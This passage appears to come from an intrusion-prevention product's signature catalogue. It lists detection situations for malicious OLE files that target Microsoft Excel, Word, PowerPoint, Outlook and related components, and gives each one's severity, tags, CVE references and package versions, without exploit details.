About this situation: A malicious Microsoft Excel document targeting CVE-2010-1245 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1697-5242
Vulnerability: Microsoft-Office-Excel-SxView-SXStreamID-Memory-Corruption-CVE-2010-1245
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Open XML File Format Converter, Microsoft Office Compatibility Pack, MS2010-10, CVE2010, Any Operating System not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Unexpected-Field-Value-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Open XML File Format Converter, Microsoft Office Compatibility Pack, MS2009-06, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-601-5211
Vulnerability: Microsoft-Office-Excel-Unexpected-Field-Value-Handling-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0824 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-467-5211
Vulnerability: Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
Description:
Back to top

File-OLE_Microsoft-Office-File-Modification-Password-Usage

About this situation: A Microsoft Office file that uses a modification password detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2015-05, CVE2015, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-699-5211
Vulnerability: Microsoft-Office-File-Modification-Password-Use-After-Free
Description:
Back to top

File-OLE_Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951
Description:
Back to top

File-OLE_Microsoft-Office-Gdiplus-EMF-File-Handling-Infinite-Loop

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2012-05, CVE2012, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-454-4333
Vulnerability: Microsoft-Office-Gdiplus-EMF-File-Handling-Infinite-Loop
Description:
Back to top

File-OLE_Microsoft-Office-Malformed-Routing-Slip-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft PowerPoint, Microsoft Word, Microsoft Outlook, Microsoft Office, MS2006-03, CVE2006, Any Operating System not specific, Microsoft Excel not specific, Microsoft PowerPoint not specific, Microsoft Word not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Office-Malformed-Routing-Slip-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-Malicious-OLE-File

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Vulnerability: Microsoft-Office-Malicious-OLE-File
Description:
Back to top

File-OLE_Microsoft-Office-MSO-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2004, MS2010-02, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1411-5242
Vulnerability: Microsoft-Office-MSO-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2004, Microsoft Office 2008, MS2010-11, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336
Description:
Back to top

File-OLE_Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-2573 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-11, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
Description:
Back to top

File-OLE_Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-2572 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-11, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
Description:
Back to top

File-OLE_Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, Microsoft Office, Microsoft Office 2004, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-PowerPoint-MS09-017

About this situation: An attempt to exploit a vulnerability in Microsoft Office PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, Microsoft Office, MS2009-05, CVE2009, Windows not specific, Microsoft PowerPoint not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Vulnerability: Microsoft-Office-PowerPoint-MS09-017
Description:
Back to top

File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0031 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
Description:
Back to top

File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0032 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
Description:
Back to top

File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0033 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
Description:
Back to top

File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0034 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
Description:
Back to top

File-OLE_Microsoft-Office-Publisher-Invalid-Memory-Reference

About this situation: An attempt to exploit a vulnerability in Microsoft Publisher detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Publisher, MS2008-02, CVE2008, Windows not specific, Microsoft Office not specific, Microsoft Publisher not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Publisher-Invalid-Memory-Reference
Description:
Back to top

File-OLE_Microsoft-Office-RCE-CVE-2017-0199

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2017-04, CVE2017, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-876-5242
Vulnerability: Miscrosoft-Office-RCE-CVE-2017-0199
Description:
Back to top

File-OLE_Microsoft-Office-Suspicious-Ddeauto-Command

About this situation: An OLE file with a suspicious DDE command was detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Vulnerability: Microsoft-Office-Suspicious-Ddeauto-Command
Description:
Back to top

File-OLE_Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution

About this situation: An attempt to exploit a code execution vulnerability in Microsoft Office Text Convertor over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2009-04, CVE2009, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2015-06, CVE2015, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-652-5211
Vulnerability: Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
Description:
Back to top

File-OLE_Microsoft-Office-Visio-Data-Type-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Visio detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Visio, MS2011-02, CVE2011, Any Operating System not specific, Microsoft Visio not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-434-4219
Vulnerability: Microsoft-Office-Visio-Data-Type-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Word-CVE-2014-6333-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office 2007, MS2014-12, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Microsoft-Office-Word-CVE-2014-6333-Use-After-Free
Description:
Back to top

File-OLE_Microsoft-Office-Word-CVE-2019-0540-Security-Feature-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, CVE2019, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1153-5242
Vulnerability: Microsoft-Office-Word-CVE-2019-0540-Security-Feature-Bypass
Description:
Back to top

File-OLE_Microsoft-Office-Word-CVE-2019-0561-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, CVE2019, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1152-5242
Vulnerability: Microsoft-Office-Word-CVE-2019-0561-Information-Disclosure
Description:
Back to top

File-OLE_Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Word detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2009-11, CVE2009, Windows not specific, Microsoft Word not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Word-HTML-Linked-Objects-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Word detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2010-08, CVE2010, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Microsoft-Office-Word-HTML-Linked-Objects-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office Compatibility Pack detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Word, Microsoft Office 2004, Microsoft Works, Microsoft Office 2008, Microsoft Open XML File Format Converter, Microsoft Office Compatibility Pack, MS2010-08, CVE2010, Any Operating System not specific, Microsoft Word not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Office-Word-Sprmtdiagline80-Record-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office for Mac detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office 2004, Microsoft Office 2008, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Microsoft-Office-Word-Sprmtdiagline80-Record-Parsing-Stack-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Office-Word-Stsh-Record-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Word detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Microsoft-Office-Word-Stsh-Record-Parsing-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-OLE-Automation-Heap-Overrun

About this situation: An attempt to exploit a vulnerability in Microsoft OLE Automation detected
Context: OLE File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows Vista, Any Hardware, MS2008-02, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-OLE-Automation-Heap-Overrun
Description:
Back to top

File-OLE_Microsoft-OLE-Property-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows XP, Any Hardware, MS2011-12, CVE2011, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-428-4219
Vulnerability: Microsoft-OLE-Property-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2023-03, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1569-5242
Vulnerability: Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397
Description:
Back to top

File-OLE_Microsoft-Outlook-Message

About this situation: Microsoft Outlook Message download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Outlook, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Outlook-RCE-CVE-2017-0106

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Outlook, MS2017-04, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-876-5242
Vulnerability: Miscrosoft-Outlook-RCE-CVE-2017-0106
Description:
Back to top

File-OLE_Microsoft-Outlook-SMB-Msg-Attachment

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2010-07, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution
Description:
Back to top

File-OLE_Microsoft-PowerPoint-2003-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Powerpoint 2003 detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint 2003, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1322-5242
Vulnerability: Microsoft-PowerPoint-2003-Heap-Overflow
Description:
Back to top

File-OLE_Microsoft-PowerPoint-95-Presentation

About this situation: Microsoft PowerPoint presentation download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft PowerPoint, Windows not specific, Microsoft PowerPoint not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Add-In

About this situation: Microsoft PowerPoint add-in download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft PowerPoint, Windows not specific, Microsoft PowerPoint not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability

About this situation: An attempt to exploit PowerPoint vulnerability CVE-2011-0655
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, MS2011-04, CVE2011, Windows not specific, Microsoft PowerPoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1623-5242
Vulnerability: Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0224
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
Description:
Back to top

File-OLE_Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability

About this situation: An attempt to exploit PowerPoint vulnerability CVE-2011-0976
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, MS2011-04, CVE2011, Windows not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-483-5211
Vulnerability: Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability
Description:
Back to top

File-OLE_Microsoft-PowerPoint-OfficeArt-Shape-RCE-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, MS2011-12, CVE2011, Windows not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1652-5242
Vulnerability: Microsoft-PowerPoint-OfficeArt-Shape-RCE-Vulnerability
Description:
Back to top

File-OLE_Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution

About this situation: Detects malicious Microsoft PowerPoint files with an invalid value in a vulnerable record
Context: OLE File Stream
Severity: 7
Tags: Windows, x86, Microsoft PowerPoint, CVE2006, Windows not specific, Microsoft PowerPoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
Description:
Back to top

File-OLE_Microsoft-PowerPoint-PPT-Document-Parsing-Exploit

About this situation: Published Microsoft PowerPoint exploit detected
Context: OLE File Stream
Severity: 7
Tags: Windows, x86, Microsoft PowerPoint, CVE2006, Windows not specific, Microsoft PowerPoint not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
Description:
Back to top

File-OLE_Microsoft-PowerPoint-PPT-File-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, CVE2006, Windows not specific, Microsoft PowerPoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-PowerPoint-PPT-File-Parsing-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Presentation

About this situation: Microsoft PowerPoint presentation download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft PowerPoint, Windows not specific, Microsoft PowerPoint not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269

About this situation: Detected attempt to exploit a vulnerability in Microsoft PowerPoint
